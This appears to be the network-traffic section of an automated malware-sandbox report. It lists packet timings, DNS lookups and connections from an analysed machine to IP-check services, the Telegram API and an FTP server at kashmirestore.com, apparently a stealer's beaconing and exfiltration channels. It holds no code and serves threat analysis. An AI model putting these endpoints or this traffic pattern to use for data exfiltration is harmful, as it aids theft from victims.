                                                                                                                            Dec 14, 2024 13:49:56.684366941 CET44349742172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.684545040 CET44349742172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.684858084 CET49742443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:56.685116053 CET49742443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:56.690201998 CET4974480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:56.810801029 CET8049744193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.810906887 CET4974480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:56.811084032 CET4974480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:56.930823088 CET8049744193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:57.658719063 CET44349743172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:57.660455942 CET49743443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:57.660494089 CET44349743172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:58.106734037 CET44349743172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:58.106894970 CET44349743172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:58.106978893 CET49743443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:58.107345104 CET49743443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:58.113181114 CET4974180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:58.114283085 CET4974680192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:58.234319925 CET8049746193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:58.234472036 CET4974680192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:58.234595060 CET8049741193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:58.234639883 CET4974680192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:58.234880924 CET4974180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:58.328589916 CET8049744193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:58.330221891 CET49747443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:58.330272913 CET44349747172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:58.330344915 CET49747443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:58.330605984 CET49747443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:58.330620050 CET44349747172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:58.354551077 CET8049746193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:58.380604029 CET4974480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:59.510355949 CET8049746193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:59.512258053 CET49748443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:59.512284994 CET44349748172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:59.512402058 CET49748443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:59.512733936 CET49748443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:59.512753010 CET44349748172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:59.551928997 CET44349747172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:59.561866045 CET49747443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:59.561887980 CET44349747172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:59.563500881 CET4974680192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:59.996597052 CET44349747172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:59.996699095 CET44349747172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:59.996844053 CET49747443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:59.997369051 CET49747443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:00.000827074 CET4974480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:00.002623081 CET4974980192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:00.121016026 CET8049744193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:00.121151924 CET4974480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:00.122432947 CET8049749193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:00.122529984 CET4974980192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:00.122747898 CET4974980192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:00.242511034 CET8049749193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:00.728591919 CET44349748172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:00.730691910 CET49748443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:00.730711937 CET44349748172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:01.173718929 CET44349748172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:01.173871994 CET44349748172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:01.173943996 CET49748443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:01.174439907 CET49748443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:01.177880049 CET4974680192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:01.179276943 CET4975080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:01.298345089 CET8049746193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:01.298437119 CET4974680192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:01.299200058 CET8049750193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:01.299284935 CET4975080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:01.299500942 CET4975080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:01.419241905 CET8049750193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:05.112823009 CET8049749193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:05.114339113 CET49752443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:05.114377022 CET44349752172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:05.114505053 CET49752443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:05.114758968 CET49752443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:05.114775896 CET44349752172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:05.157244921 CET4974980192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:06.331837893 CET44349752172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:06.333662987 CET49752443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:06.333695889 CET44349752172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:06.778218985 CET44349752172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:06.778388977 CET44349752172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:06.778580904 CET49752443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:06.779103041 CET49752443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:06.782824039 CET4974980192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:06.902940989 CET8049749193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:06.903072119 CET4974980192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:06.922516108 CET4975380192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:07.042239904 CET8049753132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:07.045691013 CET4975380192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:07.045927048 CET4975380192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:07.165607929 CET8049753132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:09.118654966 CET8049750193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:09.120198011 CET49754443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:09.120234013 CET44349754172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:09.120318890 CET49754443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:09.120600939 CET49754443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:09.120616913 CET44349754172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:09.172954082 CET4975080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:10.344818115 CET44349754172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:10.346818924 CET49754443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:10.346844912 CET44349754172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:10.797914982 CET44349754172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:10.797991991 CET44349754172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:10.798054934 CET49754443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:10.798563004 CET49754443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:10.815443993 CET4975080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:10.935651064 CET8049750193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:10.935741901 CET4975080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:10.954684973 CET49755443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:10.954734087 CET44349755149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:10.954808950 CET49755443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:10.955440998 CET49755443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:10.955449104 CET44349755149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:12.325939894 CET44349755149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:12.326205015 CET49755443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:12.328388929 CET49755443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:12.328412056 CET44349755149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:12.328821898 CET44349755149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:12.330260038 CET49755443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:12.371335030 CET44349755149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:12.827528954 CET44349755149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:12.827627897 CET44349755149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:12.827698946 CET49755443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:12.833053112 CET49755443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:17.287951946 CET8049753132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:17.289330959 CET49757443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:17.289362907 CET44349757172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:17.289449930 CET49757443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:17.289670944 CET49757443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:17.289684057 CET44349757172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:17.329144001 CET4975380192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:18.031740904 CET4972480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:18.513835907 CET44349757172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:18.515727043 CET49757443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:18.515767097 CET44349757172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:18.947168112 CET4975821192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:50:18.963953018 CET44349757172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:18.964118004 CET44349757172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:18.964179993 CET49757443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:18.964564085 CET49757443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:18.968465090 CET4975380192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:18.969698906 CET4975980192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:19.067023993 CET2149758119.18.54.39192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:19.067142010 CET4975821192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:50:19.069017887 CET4975821192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:50:19.088610888 CET8049753132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:19.088754892 CET4975380192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:19.089386940 CET8049759132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:19.089473009 CET4975980192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:19.089621067 CET4975980192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:19.188921928 CET2149758119.18.54.39192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:19.188996077 CET4975821192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:50:19.210180998 CET8049759132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:20.581974030 CET4976021192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:50:20.702133894 CET2149760119.18.54.39192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:20.702358007 CET4976021192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:50:20.702550888 CET4976021192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:50:20.822571039 CET2149760119.18.54.39192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:20.822701931 CET4976021192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:50:22.347810984 CET8049759132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:22.349273920 CET49763443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:22.349328041 CET44349763172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:22.349399090 CET49763443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:22.349648952 CET49763443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:22.349666119 CET44349763172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:22.391680956 CET4975980192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:23.566801071 CET44349763172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:23.568614006 CET49763443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:23.568634033 CET44349763172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:24.188107014 CET44349763172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:24.188183069 CET44349763172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:24.188414097 CET49763443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:24.189379930 CET49763443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:24.193056107 CET4975980192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:24.194433928 CET4976480192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:24.312998056 CET8049759132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:24.313159943 CET4975980192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:24.314131021 CET8049764132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:24.314213991 CET4976480192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:24.314376116 CET4976480192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:24.434132099 CET8049764132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:25.618638039 CET8049764132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:25.636387110 CET49765443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:25.636441946 CET44349765172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:25.636511087 CET49765443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:25.636856079 CET49765443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:25.636876106 CET44349765172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:25.672878981 CET4976480192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:26.850687981 CET44349765172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:26.854401112 CET49765443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:26.854430914 CET44349765172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:27.298557997 CET44349765172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:27.298640966 CET44349765172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:27.298765898 CET49765443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:27.299341917 CET49765443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:27.302264929 CET4976480192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:27.303448915 CET4976680192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:27.423039913 CET8049764132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:27.423155069 CET4976480192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:27.423835993 CET8049766132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:27.425997019 CET4976680192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:27.426146030 CET4976680192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:27.546099901 CET8049766132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:28.729875088 CET8049766132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:28.740883112 CET49767443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:28.740926981 CET44349767172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:28.740983963 CET49767443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:28.741271019 CET49767443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:28.741283894 CET44349767172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:28.782285929 CET4976680192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:29.958041906 CET44349767172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:29.959727049 CET49767443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:29.959745884 CET44349767172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:30.404712915 CET44349767172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:30.404783964 CET44349767172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:30.405101061 CET49767443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:30.405462980 CET49767443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:30.415141106 CET4976680192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:30.416090012 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:30.416136026 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:30.416220903 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:30.416642904 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:30.416660070 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:30.535258055 CET8049766132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:30.535399914 CET4976680192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:31.785404921 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:31.785484076 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:31.786937952 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:31.786945105 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:31.787183046 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:31.788613081 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:31.835330009 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:32.299201965 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:32.299266100 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:32.299333096 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:32.301582098 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:37.454809904 CET4974080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:39.129287958 CET4977021192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:50:39.249408960 CET2149770119.18.54.39192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:39.249685049 CET4977021192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:50:39.250030041 CET4977021192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:50:39.369945049 CET2149770119.18.54.39192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:39.370012999 CET4977021192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:51:01.550795078 CET4970880192.168.2.6199.232.210.172
                                                                                                                            Dec 14, 2024 13:51:01.550825119 CET49706443192.168.2.620.190.181.4
                                                                                                                            Dec 14, 2024 13:51:01.731396914 CET8049708199.232.210.172192.168.2.6
                                                                                                                            Dec 14, 2024 13:51:01.731427908 CET4434970620.190.181.4192.168.2.6
                                                                                                                            Dec 14, 2024 13:51:01.731441021 CET4970880192.168.2.6199.232.210.172
                                                                                                                            Dec 14, 2024 13:51:01.731476068 CET49706443192.168.2.620.190.181.4
                                                                                                                            Dec 14, 2024 13:51:02.673247099 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:51:02.793632984 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:51:02.795967102 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:51:07.767340899 CET49711443192.168.2.620.190.181.4
                                                                                                                            Dec 14, 2024 13:51:07.887731075 CET4434971120.190.181.4192.168.2.6
                                                                                                                            Dec 14, 2024 13:51:07.887857914 CET49711443192.168.2.620.190.181.4

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 14, 2024 13:49:36.086127043 CET5302353192.168.2.61.1.1.1
                                                                                                                            Dec 14, 2024 13:49:36.224576950 CET53530231.1.1.1192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:38.007072926 CET6511353192.168.2.61.1.1.1
                                                                                                                            Dec 14, 2024 13:49:38.469408035 CET53651131.1.1.1192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:42.295229912 CET6341853192.168.2.61.1.1.1
                                                                                                                            Dec 14, 2024 13:49:42.437077999 CET53634181.1.1.1192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:06.783317089 CET6446353192.168.2.61.1.1.1
                                                                                                                            Dec 14, 2024 13:50:06.920958042 CET53644631.1.1.1192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:10.816241980 CET5917853192.168.2.61.1.1.1
                                                                                                                            Dec 14, 2024 13:50:10.953824997 CET53591781.1.1.1192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:18.197474003 CET6051053192.168.2.61.1.1.1
                                                                                                                            Dec 14, 2024 13:50:18.946362972 CET53605101.1.1.1192.168.2.6

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Dec 14, 2024 13:49:36.086127043 CET192.168.2.61.1.1.10xbb37Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:38.007072926 CET192.168.2.61.1.1.10x86e3Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:42.295229912 CET192.168.2.61.1.1.10x74d9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:50:06.783317089 CET192.168.2.61.1.1.10x179bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:50:10.816241980 CET192.168.2.61.1.1.10x837aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:50:18.197474003 CET192.168.2.61.1.1.10x87f1Standard query (0)kashmirestore.comA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Dec 14, 2024 13:49:36.224576950 CET1.1.1.1192.168.2.60xbb37No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:36.224576950 CET1.1.1.1192.168.2.60xbb37No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:36.224576950 CET1.1.1.1192.168.2.60xbb37No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:36.224576950 CET1.1.1.1192.168.2.60xbb37No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:36.224576950 CET1.1.1.1192.168.2.60xbb37No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:36.224576950 CET1.1.1.1192.168.2.60xbb37No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:38.469408035 CET1.1.1.1192.168.2.60x86e3No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:38.469408035 CET1.1.1.1192.168.2.60x86e3No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:42.437077999 CET1.1.1.1192.168.2.60x74d9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:42.437077999 CET1.1.1.1192.168.2.60x74d9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:42.437077999 CET1.1.1.1192.168.2.60x74d9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:42.437077999 CET1.1.1.1192.168.2.60x74d9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:42.437077999 CET1.1.1.1192.168.2.60x74d9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:42.437077999 CET1.1.1.1192.168.2.60x74d9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:44.302066088 CET1.1.1.1192.168.2.60x66f1No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:44.302066088 CET1.1.1.1192.168.2.60x66f1No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                            Dec 14, 2024 13:49:45.989290953 CET1.1.1.1192.168.2.60xb400No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
